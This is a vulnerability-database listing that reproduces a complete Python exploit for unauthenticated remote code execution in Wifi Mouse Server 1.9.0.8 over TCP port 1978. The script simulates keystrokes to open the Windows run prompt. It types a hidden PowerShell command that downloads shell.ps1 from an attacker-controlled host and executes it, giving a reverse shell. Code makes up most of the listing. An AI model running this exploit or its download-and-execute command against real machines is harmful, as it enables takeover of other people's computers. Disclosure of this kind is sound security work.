📄 Wifi Mouse 1.9.0.8 Remote Code Execution

🗓️ 21 Jul 2025 00:00:00Reported by Chokri HammediType
packetstorm🔗 packetstorm.news👁 104 Views
Unauthenticated remote code execution in Wifi Mouse Server 1.9.0.8 via TCP port 1978.
# Exploit Title: Wifi Mouse version 1.9.0.8 - Remote Code Execution
    # Date: 19/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://wifimouse.necta.us/
    # Software Link: https://wifimouse.necta.us/apk/MouseServer.exe
    # Version: 1.9.0.8 (Windows)
    # Tested on: Windows 10 / Windows 11
    
    
    '''
    Description:
    
    WiFi Mouse Server 1.9.0.8 allows unauthenticated remote code execution by
    simulating keyboard input over TCP port 1978. This exploit connects to the
    server, simulates a  keystrokes to delivery reverse shell.
    
    
    '''
    
    
    import socket
    import time
    
    class RemoteControlClient:
        def __init__(self, ip="192.168.8.103", port=1978):
            self.target_ip = ip
            self.target_port = port
            self.socket = None
            self.output_stream = None
            self.isystem = 0
    
        def connect(self):
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.connect((self.target_ip, self.target_port))
            self.output_stream = self.socket.makefile('wb')
            handshake = [b"reportCurrentApp\x0a", b"dontreportCurrentApp\x0a"]
            for cmd in handshake:
                self.socket.sendall(cmd)
                time.sleep(0.08)
            self.socket.recv(1024)
    
        def _send_command(self, prefix, command):
            length = len(command)
            length_prefix = f"{prefix}  {length}" if length < 10 else
    f"{prefix} {length}"
            message = (length_prefix + command).encode('utf-8')
            self.output_stream.write(message)
            self.output_stream.flush()
            time.sleep(0.03)
    
        def send_key(self, key_name, action="press"):
            key_mapping =
    {"ENTER":"RTN","BACKSPACE":"BAS","DEL":"BAS","WIN":"WIN","ALT":"ALT"}
            key_name = key_mapping.get(key_name.upper(), key_name)
            if action == "press":
                self._send_command("key", f"[R] {key_name} d")
                time.sleep(0.07)
                self._send_command("key", f"[R] {key_name} u")
            elif action == "down":
                self._send_command("key", f"[R] {key_name} d")
            elif action == "up":
                self._send_command("key", f"[R] {key_name} u")
    
        def send_key_code(self, key_code, action="press"):
            if key_code == 66:
                self.send_key("RTN", action)
            elif key_code == 67:
                self.send_key("BAS", action)
            else:
                self._send_command("key", f"[R] {key_code} {action[0]}")
    
        def send_text(self, text):
            for char in text:
                if char == '\n':
                    self.send_key("ENTER")
                elif char == '\b':
                    self.send_key("BACKSPACE")
                else:
                    self.socket.sendall(f"utf8 {char}\x0a".encode('utf-8'))
                    time.sleep(0.09)
    
        def execute_payload(self):
            try:
                self.connect()
                time.sleep(0.9)
                self.send_key("WIN")
                time.sleep(0.9)
                self.send_text("powershell -nop -w hidden -c \"iwr
    http://192.168.8.102:8080/shell.ps1 -UseBasicParsing | iex\"")
                time.sleep(1)
                self.send_key_code(66)
                time.sleep(1)
                self.send_text("exit")
                self.send_key_code(66)
            except Exception:
                pass
            finally:
                if self.socket:
                    self.socket.close()
    
    if __name__ == "__main__":
        rc = RemoteControlClient()
        rc.execute_payload()
21 Jul 2025 00:00Current
8.4High risk
Vulners AI Score8.4